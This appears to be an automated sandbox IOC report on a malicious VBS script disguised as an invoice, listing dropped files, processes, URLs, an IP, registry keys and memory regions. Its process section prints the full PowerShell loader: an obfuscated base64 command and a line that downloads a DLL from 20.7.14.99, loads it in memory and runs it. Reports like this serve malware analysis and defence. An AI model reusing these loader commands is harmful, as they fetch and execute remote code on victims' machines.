IOC Report
Ref. No INV088002904SINO.vbs

loading gif

Files

File Path
Type
Category
Malicious
Ref. No INV088002904SINO.vbs
Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3rm35jv.ftv.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjajxajs.yzb.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rv5m2ibe.fsd.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tigd1obk.kyu.ps1
very short file (no magic)
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Ref. No INV088002904SINO.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://20.7.14.99
unknown
malicious
http://20.7.14.99/server/dll.txt
20.7.14.99
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://github.com/Pester/Pester
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
There are 1 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
20.7.14.99
unknown
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1B0AAB90000
trusted library allocation
page read and write
216B8820000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B0AABAC000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
30391CE000
stack
page read and write
216B867A000
heap
page read and write
15CFEE62000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
216B871C000
heap
page read and write
2169E5E0000
heap
page read and write
1B0AAD62000
heap
page read and write
1B092860000
trusted library allocation
page read and write
238CC053000
heap
page read and write
216A0530000
heap
page read and write
1B090A80000
heap
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B092870000
heap
page read and write
1B090C00000
heap
page readonly
F18603B000
stack
page read and write
7FF816346000
trusted library allocation
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B0AAD19000
heap
page read and write
7FF8164F0000
trusted library allocation
page read and write
1B0AABAC000
trusted library allocation
page read and write
7FF816540000
trusted library allocation
page read and write
216B8617000
heap
page execute and read and write
F185D3E000
stack
page read and write
F185E38000
stack
page read and write
238CBB71000
heap
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF816610000
trusted library allocation
page read and write
216B86D9000
heap
page read and write
F185D37000
stack
page read and write
1B0AB138000
heap
page read and write
7FF816470000
trusted library allocation
page read and write
1B0AB0D4000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF816510000
trusted library allocation
page read and write
2169E680000
heap
page read and write
1B0AB0A9000
heap
page read and write
15CFED20000
heap
page read and write
1B0AABB0000
trusted library allocation
page read and write
1B090BE0000
heap
page read and write
7FF8162A3000
trusted library allocation
page read and write
216A0521000
trusted library allocation
page read and write
1B0AAD2C000
heap
page read and write
238CBB70000
heap
page read and write
1B092860000
trusted library allocation
page read and write
1B0AAB40000
heap
page execute and read and write
7FF81634C000
trusted library allocation
page execute and read and write
216A05FF000
trusted library allocation
page read and write
238CBB81000
heap
page read and write
1B0AAD6C000
heap
page read and write
7FF816290000
trusted library allocation
page read and write
303833E000
stack
page read and write
238CBC10000
heap
page read and write
1B0AAD3F000
heap
page read and write
30385FF000
stack
page read and write
216A07F2000
trusted library allocation
page read and write
1B0AB0E5000
heap
page read and write
1B0AAB81000
trusted library allocation
page read and write
216B8823000
heap
page read and write
1B090B6E000
heap
page read and write
2169E70D000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B090B60000
heap
page read and write
7FF816550000
trusted library allocation
page read and write
7FF816527000
trusted library allocation
page read and write
7FF8165C0000
trusted library allocation
page read and write
1B0AB12E000
heap
page read and write
2169E6C0000
trusted library allocation
page read and write
1B0AAB84000
trusted library allocation
page read and write
216B86E8000
heap
page read and write
216B870E000
heap
page read and write
7FF816450000
trusted library allocation
page execute and read and write
15CFEE29000
heap
page read and write
1B0AABB0000
trusted library allocation
page read and write
1B0AAB97000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AABA3000
trusted library allocation
page read and write
2169E600000
heap
page read and write
1B0AAB89000
trusted library allocation
page read and write
1B092790000
trusted library allocation
page read and write
216B86C5000
heap
page read and write
216A089C000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF816436000
trusted library allocation
page read and write
216A0B34000
trusted library allocation
page read and write
7FF8165D0000
trusted library allocation
page read and write
3037DFF000
stack
page read and write
303827E000
stack
page read and write
238CBB87000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B092A11000
trusted library allocation
page read and write
18F07B000
stack
page read and write
18EE7E000
stack
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B092857000
heap
page execute and read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
2169E6A0000
trusted library allocation
page read and write
F185DB9000
stack
page read and write
1B0AAD21000
heap
page read and write
1B092861000
trusted library allocation
page read and write
1B090AB9000
heap
page read and write
30384BA000
stack
page read and write
1B0AAD2E000
heap
page read and write
1B092860000
trusted library allocation
page read and write
2169E6D0000
heap
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B0AACF0000
heap
page read and write
7FF816442000
trusted library allocation
page read and write
1B0AAB84000
trusted library allocation
page read and write
216A0520000
trusted library allocation
page read and write
238CBBAB000
heap
page read and write
3038438000
stack
page read and write
1B092860000
trusted library allocation
page read and write
7FF8165B0000
trusted library allocation
page read and write
216A0520000
trusted library allocation
page read and write
15CFED90000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
216A0510000
trusted library allocation
page read and write
1B0AAB86000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAB9A000
trusted library allocation
page read and write
1B09412F000
trusted library allocation
page read and write
1B0AAB60000
trusted library allocation
page read and write
2169E7B4000
heap
page read and write
1B0AABA0000
trusted library allocation
page read and write
7FF816441000
trusted library allocation
page read and write
1B0AACC0000
trusted library allocation
page read and write
1B0AABB0000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B090BC0000
trusted library allocation
page read and write
7FF8162CC000
trusted library allocation
page execute and read and write
F185FBE000
stack
page read and write
1B092860000
trusted library allocation
page read and write
D1598FC000
stack
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF81644D000
trusted library allocation
page read and write
F1859FE000
stack
page read and write
216B8830000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B094140000
trusted library allocation
page read and write
7FF816424000
trusted library allocation
page read and write
238CBC10000
heap
page read and write
7FF8165D0000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
238CBC70000
heap
page read and write
216A0066000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAB89000
trusted library allocation
page read and write
1B0AB093000
heap
page read and write
7FF8164C0000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
1B0AABA6000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
303807E000
stack
page read and write
2169E717000
heap
page read and write
1B0AAB96000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B0AB138000
heap
page read and write
1B0AAB84000
trusted library allocation
page read and write
2169E75A000
heap
page read and write
15CFEE8F000
heap
page read and write
1B090BA3000
heap
page read and write
238CA030000
heap
page read and write
238CBEC1000
heap
page read and write
216B8700000
heap
page read and write
1B090AF8000
heap
page read and write
1B0AAB60000
trusted library allocation
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAD32000
heap
page read and write
216B85B0000
heap
page execute and read and write
1B0AB120000
heap
page read and write
7FF816500000
trusted library allocation
page read and write
1B0AAB9B000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
D1593FF000
stack
page read and write
1B0AABA0000
trusted library allocation
page read and write
7FF816283000
trusted library allocation
page read and write
7FF8165E0000
trusted library allocation
page read and write
216B86C8000
heap
page read and write
1B0AAB9C000
trusted library allocation
page read and write
216B8820000
trusted library allocation
page read and write
216B0541000
trusted library allocation
page read and write
1B0AAB84000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
238CBB81000
heap
page read and write
7FF8165E0000
trusted library allocation
page read and write
7FF816520000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B093D0E000
trusted library allocation
page read and write
1B0AAB8A000
trusted library allocation
page read and write
7FF816490000
trusted library allocation
page execute and read and write
7FF816293000
trusted library allocation
page execute and read and write
1B0AB13E000
heap
page read and write
1B0AB0EA000
heap
page read and write
1B090C10000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
15CFEE3C000
heap
page read and write
1B0AABB0000
trusted library allocation
page read and write
1B0AAB98000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
7FF816326000
trusted library allocation
page read and write
238CBDC0000
heap
page read and write
238CBDF0000
heap
page read and write
216B8830000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B0AAD2A000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
238C9E49000
heap
page read and write
F1858FE000
stack
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B093BF1000
trusted library allocation
page read and write
1B0AAB8E000
trusted library allocation
page read and write
1B0AAD17000
heap
page read and write
1B0AAB92000
trusted library allocation
page read and write
1B090B0C000
heap
page read and write
7FF816540000
trusted library allocation
page read and write
238CC0C0000
heap
page read and write
1B0AAD51000
heap
page read and write
1B0AAD56000
heap
page read and write
3037D7D000
stack
page read and write
30381FE000
stack
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AB05A000
heap
page read and write
1B0AB0F6000
heap
page read and write
7DF4ABB30000
trusted library allocation
page execute and read and write
1B0AAD45000
heap
page read and write
303817E000
stack
page read and write
1B092860000
trusted library allocation
page read and write
F185A7D000
stack
page read and write
1B0AAB90000
trusted library allocation
page read and write
216A04F4000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B0AACD0000
trusted library allocation
page read and write
15CFEF00000
heap
page read and write
7FF816320000
trusted library allocation
page read and write
15CFEF02000
heap
page read and write
216B86DC000
heap
page read and write
1B0AB0CC000
heap
page read and write
303853F000
stack
page read and write
1B090AF2000
heap
page read and write
1B0AABB0000
trusted library allocation
page read and write
216B8820000
trusted library allocation
page read and write
2169E6B0000
heap
page readonly
1B093DB8000
trusted library allocation
page read and write
7FF816499000
trusted library allocation
page read and write
15CFEDC0000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
D158EF9000
stack
page read and write
1B0AAB84000
trusted library allocation
page read and write
216A05F9000
trusted library allocation
page read and write
238CBB7D000
heap
page read and write
1B0AAB8E000
trusted library allocation
page read and write
7FF816376000
trusted library allocation
page execute and read and write
F185F3F000
stack
page read and write
238CA080000
heap
page read and write
1B0AABA2000
trusted library allocation
page read and write
216A07E8000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF816280000
trusted library allocation
page read and write
216B8820000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
238CC0CE000
heap
page read and write
1B0AAB84000
trusted library allocation
page read and write
1B093ED2000
trusted library allocation
page read and write
D1595FE000
stack
page read and write
216B8840000
trusted library allocation
page read and write
1B0AABA5000
trusted library allocation
page read and write
1B0AAB9A000
trusted library allocation
page read and write
F18587E000
stack
page read and write
7FF816432000
trusted library allocation
page read and write
15CFEE00000
heap
page read and write
7FF8165A0000
trusted library allocation
page read and write
18F37F000
stack
page read and write
1B0908F0000
heap
page read and write
1B0AAB95000
trusted library allocation
page read and write
1B0AAB97000
trusted library allocation
page read and write
7FF816294000
trusted library allocation
page read and write
30382F8000
stack
page read and write
7FF816270000
trusted library allocation
page read and write
1B0AAD64000
heap
page read and write
216B86F1000
heap
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B092C24000
trusted library allocation
page read and write
1B0AB0A3000
heap
page read and write
1B0AB06E000
heap
page read and write
1B090C70000
heap
page read and write
7FF8165C0000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B090AEC000
heap
page read and write
238C9CA0000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF816590000
trusted library allocation
page read and write
7FF8164D0000
trusted library allocation
page read and write
7FF816600000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
216B86C1000
heap
page read and write
1B092860000
trusted library allocation
page read and write
7FF8165A0000
trusted library allocation
page execute and read and write
216B86B1000
heap
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAB91000
trusted library allocation
page read and write
1B0AB125000
heap
page read and write
1B092860000
trusted library allocation
page read and write
2169E787000
heap
page read and write
1B0AAB81000
trusted library allocation
page read and write
7FF816490000
trusted library allocation
page read and write
1B090BE5000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF816290000
trusted library allocation
page read and write
1B093FDC000
trusted library allocation
page read and write
7FF8164C9000
trusted library allocation
page read and write
1B092864000
trusted library allocation
page read and write
F185B7E000
stack
page read and write
216A04F0000
trusted library allocation
page read and write
216A0520000
trusted library allocation
page read and write
1B0AAB96000
trusted library allocation
page read and write
30386BE000
stack
page read and write
1B0AAD3E000
heap
page read and write
1B0AACE0000
heap
page read and write
7FF816500000
trusted library allocation
page read and write
216B870B000
heap
page read and write
1B0AB13E000
heap
page read and write
7FF816580000
trusted library allocation
page read and write
F185AFE000
stack
page read and write
7FF8164B0000
trusted library allocation
page read and write
7FF816530000
trusted library allocation
page read and write
1B093624000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AB093000
heap
page read and write
216B8714000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
303914E000
stack
page read and write
238C9E00000
heap
page read and write
7FF816560000
trusted library allocation
page read and write
7FF81627D000
trusted library allocation
page execute and read and write
7FF8164A0000
trusted library allocation
page read and write
1B0AB0CC000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AB0FC000
heap
page read and write
1B0A2A6F000
trusted library allocation
page read and write
1B0AAB83000
trusted library allocation
page read and write
15CFEE69000
heap
page read and write
1B0AAB82000
trusted library allocation
page read and write
15CFEE66000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAB70000
trusted library allocation
page read and write
1B0AB0F0000
heap
page read and write
216B86D5000
heap
page read and write
1B0AAD09000
heap
page read and write
1B0AAB82000
trusted library allocation
page read and write
1B0AAB89000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
216B8707000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
15CFEE77000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
7FF816580000
trusted library allocation
page read and write
15CFEE5F000
heap
page read and write
1B0AB0FD000
heap
page read and write
1B092850000
heap
page execute and read and write
1B0AABA0000
trusted library allocation
page read and write
1B092840000
trusted library allocation
page read and write
238CA085000
heap
page read and write
1B0AABB0000
trusted library allocation
page read and write
18EB4B000
stack
page read and write
1B0AB104000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
216A0060000
heap
page read and write
1B0AAB93000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
18F27F000
stack
page read and write
216A0520000
trusted library allocation
page read and write
216B86FC000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AABB0000
trusted library allocation
page read and write
7FF816480000
trusted library allocation
page read and write
1B0AB0DB000
heap
page read and write
1B0AAB9C000
trusted library allocation
page read and write
1B0AABC0000
heap
page read and write
1B090B39000
heap
page read and write
7FF816412000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B090A50000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
D1590FE000
stack
page read and write
1B0AB13E000
heap
page read and write
1B0AABA4000
trusted library allocation
page read and write
15CFF802000
trusted library allocation
page read and write
1B090C75000
heap
page read and write
1B0AABAD000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
238CBB72000
heap
page read and write
7FF816480000
trusted library allocation
page read and write
1B094147000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
7FF8162A0000
trusted library allocation
page read and write
2169E755000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
238CBB97000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
216A0520000
trusted library allocation
page read and write
216B86B6000
heap
page read and write
216B867F000
heap
page read and write
D1596FE000
stack
page read and write
1B0AAB80000
trusted library allocation
page read and write
15CFED30000
heap
page read and write
1B09288D000
heap
page read and write
1B0AAD68000
heap
page read and write
15CFEE63000
heap
page read and write
7FF8164A0000
trusted library allocation
page read and write
7FF816340000
trusted library allocation
page read and write
216A0520000
trusted library allocation
page read and write
1B0A2A20000
trusted library allocation
page read and write
1B0AABA0000
trusted library allocation
page read and write
303924D000
stack
page read and write
7FF81629D000
trusted library allocation
page execute and read and write
3037CF5000
stack
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
7FF8164D0000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
7FF816292000
trusted library allocation
page read and write
1B0AB12E000
heap
page read and write
216A0521000
trusted library allocation
page read and write
216B86E4000
heap
page read and write
7FF816530000
trusted library allocation
page read and write
7FF816330000
trusted library allocation
page execute and read and write
1B0AAB90000
trusted library allocation
page read and write
7FF816570000
trusted library allocation
page read and write
7FF8164F7000
trusted library allocation
page read and write
216B8713000
heap
page read and write
18EBCF000
stack
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF81642D000
trusted library allocation
page read and write
7FF81632C000
trusted library allocation
page execute and read and write
1B090950000
remote allocation
page read and write
1B0AAB83000
trusted library allocation
page read and write
1B0A2A11000
trusted library allocation
page read and write
7FF816460000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AAD1D000
heap
page read and write
1B0AAB92000
trusted library allocation
page read and write
7FF816273000
trusted library allocation
page execute and read and write
1B093DBA000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
238CBC10000
heap
page read and write
1B092A00000
heap
page execute and read and write
1B0AABA0000
trusted library allocation
page read and write
7FF816510000
trusted library allocation
page read and write
7FF816560000
trusted library allocation
page read and write
2169E6E3000
heap
page read and write
1B093FD6000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF8165B0000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
2169E685000
heap
page read and write
216B86E4000
heap
page read and write
238CBDC7000
heap
page read and write
1B090B36000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
F185BFF000
stack
page read and write
216B86AE000
heap
page read and write
15CFEF13000
heap
page read and write
238CBDC3000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
216B871A000
heap
page read and write
1B0A2CEA000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
216A055A000
trusted library allocation
page read and write
F1855F5000
stack
page read and write
1B0AAB90000
trusted library allocation
page read and write
18EF7B000
stack
page read and write
216B8717000
heap
page read and write
18F177000
stack
page read and write
238CBB83000
heap
page read and write
1B090BF0000
trusted library allocation
page read and write
216A0541000
trusted library allocation
page read and write
7FF816350000
trusted library allocation
page execute and read and write
1B0AAD2A000
heap
page read and write
216B8610000
heap
page execute and read and write
7FF8164E0000
trusted library allocation
page read and write
1B090B34000
heap
page read and write
238C9E32000
heap
page read and write
238CC0DA000
heap
page read and write
1B092760000
trusted library allocation
page read and write
1B093DBC000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
216B8830000
trusted library allocation
page read and write
216A0521000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
216B86F7000
heap
page read and write
238CBE10000
heap
page read and write
1B0AABA2000
trusted library allocation
page read and write
216B86D2000
heap
page read and write
2169E713000
heap
page read and write
2169E795000
heap
page read and write
1B0A2BA7000
trusted library allocation
page read and write
216B8681000
heap
page read and write
1B0AAD2A000
heap
page read and write
1B0AB138000
heap
page read and write
7FF816421000
trusted library allocation
page read and write
7FF8164C0000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
1B092830000
trusted library allocation
page read and write
216B05A0000
trusted library allocation
page read and write
1B0AAB97000
trusted library allocation
page read and write
7FF816550000
trusted library allocation
page read and write
F185EBE000
stack
page read and write
1B0AB095000
heap
page read and write
1B090AB0000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
303873B000
stack
page read and write
7FF8164B0000
trusted library allocation
page read and write
7FF8164E0000
trusted library allocation
page read and write
216B85D0000
heap
page read and write
7FF8163B0000
trusted library allocation
page execute and read and write
238C9E20000
heap
page read and write
1B090AF4000
heap
page read and write
238CBDF0000
heap
page read and write
1B0A2BB2000
trusted library allocation
page read and write
2169E670000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AAD70000
heap
page read and write
7FF8165F0000
trusted library allocation
page read and write
1B0AAB85000
trusted library allocation
page read and write
1B0AABA0000
trusted library allocation
page read and write
238CBB97000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
7FF816390000
trusted library allocation
page execute and read and write
D1592FF000
stack
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B0AABA0000
trusted library allocation
page read and write
15CFEE59000
heap
page read and write
7FF816356000
trusted library allocation
page execute and read and write
216B86DB000
heap
page read and write
1B0AABA0000
trusted library allocation
page read and write
2169E630000
heap
page read and write
F185CBF000
stack
page read and write
216A0500000
heap
page execute and read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AAB9B000
trusted library allocation
page read and write
7FF816462000
trusted library allocation
page read and write
216B8820000
trusted library allocation
page read and write
238CBEC0000
heap
page read and write
F18597F000
stack
page read and write
30380FD000
stack
page read and write
1B0AABA0000
trusted library allocation
page read and write
238CBB9A000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
238CC053000
heap
page read and write
7FF816274000
trusted library allocation
page read and write
30385BF000
stack
page read and write
1B0AAD1A000
heap
page read and write
1B0AB040000
heap
page read and write
1B092A65000
trusted library allocation
page read and write
2169E4A0000
heap
page read and write
238CBDC2000
heap
page read and write
1B0AABA0000
trusted library allocation
page read and write
216B0550000
trusted library allocation
page read and write
1B0AAB89000
trusted library allocation
page read and write
238CC17C000
heap
page read and write
D158FFE000
stack
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B0AB068000
heap
page read and write
1B092AB2000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
30383B7000
stack
page read and write
216B8830000
trusted library allocation
page read and write
2169E72D000
heap
page read and write
238C9E5D000
heap
page read and write
216B8620000
heap
page read and write
238CBBA3000
heap
page read and write
1B0AB09F000
heap
page read and write
15CFEE81000
heap
page read and write
1B0AAD5A000
heap
page read and write
1B0AB0F9000
heap
page read and write
1B0AB0CF000
heap
page read and write
1B092861000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
238C9EFC000
heap
page read and write
1B0AAD26000
heap
page read and write
1B0AABA0000
trusted library allocation
page read and write
1B092860000
trusted library allocation
page read and write
1B0AAB82000
trusted library allocation
page read and write
216A0882000
trusted library allocation
page read and write
1B0AAB90000
trusted library allocation
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B0AAB89000
trusted library allocation
page read and write
1B0AB076000
heap
page read and write
1B0AAB81000
trusted library allocation
page read and write
1B0AAB8C000
trusted library allocation
page read and write
1B090A30000
heap
page read and write
1B0AB11F000
heap
page read and write
216A0983000
trusted library allocation
page read and write
216A07E4000
trusted library allocation
page read and write
238C9DE0000
heap
page read and write
7FF816570000
trusted library allocation
page read and write
D1597FE000
stack
page read and write
1B0AAB80000
trusted library allocation
page read and write
216B871E000
heap
page read and write
216A0980000
trusted library allocation
page read and write
216A0965000
trusted library allocation
page read and write
7FF816520000
trusted library allocation
page read and write
1B090AEE000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
15CFEE13000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
238CC0C1000
heap
page read and write
1B0AAB90000
trusted library allocation
page read and write
216B86AC000
heap
page read and write
7FF816470000
trusted library allocation
page execute and read and write
1B0AAB86000
trusted library allocation
page read and write
1B092834000
trusted library allocation
page read and write
1B0AAD4E000
heap
page read and write
2169E6D9000
heap
page read and write
7FF8164F0000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
